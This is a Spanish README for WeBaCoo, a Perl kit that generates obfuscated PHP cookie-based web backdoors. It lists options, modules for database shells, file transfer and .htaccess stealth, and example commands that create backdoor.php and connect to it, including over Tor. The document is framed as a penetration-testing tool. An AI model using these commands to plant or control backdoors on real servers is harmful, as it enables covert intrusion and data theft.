
Script-Kit de puerta trasera web mediante cookies
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Script-Kit de Cookie Backdoor Web
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Escrito por: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
La herramienta es solo para fines de prueba y solo puede usarse donde se haya dado un consentimiento estricto. No la use para fines ilegales.
Cualquier modificación, cambio o alteración de esta aplicación es aceptable, sin embargo, cualquier publicación pública que utilice este código debe ser aprobada por su creador. Consulte el archivo LICENSE para obtener más información.
Si no desea instalar "libio-socket-socks-perl" para la función de proxy Tor, comente la línea 25 en webacoo.pl
webacoo.pl [opciones]
Opciones: -g Generar código backdoor (-o es requerido)
-f FUNCTION Función del sistema PHP a usar FUNCTION 1: system (por defecto) 2: shell_exec 3: exec 4: passthru 5: popen
-o OUTPUT Nombre de archivo de salida del backdoor generado
-r Devolver código backdoor sin ofuscar
-t Establecer conexión "terminal" remota (-u es requerido)
-u URL URL del backdoor
-e CMD Modo de ejecución de un solo comando (-t y -u son requeridos)
-m METHOD Método HTTP a usar (por defecto "GET")
-c C_NAME Nombre de la cookie (por defecto: "M-cookie")
-d DELIM Delimitador (por defecto: nuevo aleatorio por cada solicitud)
-a AGENT User-Agent del encabezado HTTP (por defecto existe)
-p PROXY Usar proxy (tor, ip:puerto o usuario:contraseña:ip:puerto)
-v LEVEL Nivel de verbose LEVEL 0: sin información adicional (por defecto) 1: imprimir encabezados HTTP 2: imprimir encabezados HTTP + datos
-l LOG Registrar actividad en un archivo
-h Mostrar ayuda y salir
update Buscar actualizaciones y aplicarlas si las hay
Desde la versión 0.2.1 se ha agregado soporte para módulos de extensión para proporcionar funcionalidades adicionales a WeBaCoo. Dentro del modo terminal puedes ejecutar 'load' para listar los módulos disponibles e inicializar el deseado de la lista. Escribiendo 'unload' puedes restaurar el modo terminal inicial.
Módulos de extensión disponibles: o mysql-cli Módulo de línea de comandos MySQL o psql-cli Módulo de línea de comandos Postgres o upload Módulo de subida de archivos mediante HTTP Post o download Módulo de descarga de archivos usando salida estándar a través de 'od' y 'xxd' o stealth Módulo de sigilo mejorado mediante manejo de .htaccess
Crear backdoor ofuscado 'backdoor.php' con configuración predeterminada ./webacoo.pl -g -o backdoor.php
Crear backdoor sin ofuscar 'raw-backdoor.php' usando la función 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Establecer conexión "terminal" con el host remoto usando la configuración predeterminada ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Establecer conexión "terminal" con el host remoto configurando algunos argumentos ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Establecer conexión "terminal" con el host remoto a través de un proxy HTTP local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Establecer conexión "terminal" con el host remoto a través de un proxy HTTP con autenticación básica ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Establecer conexión "terminal" con el host remoto a través de Tor y registrar actividad ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt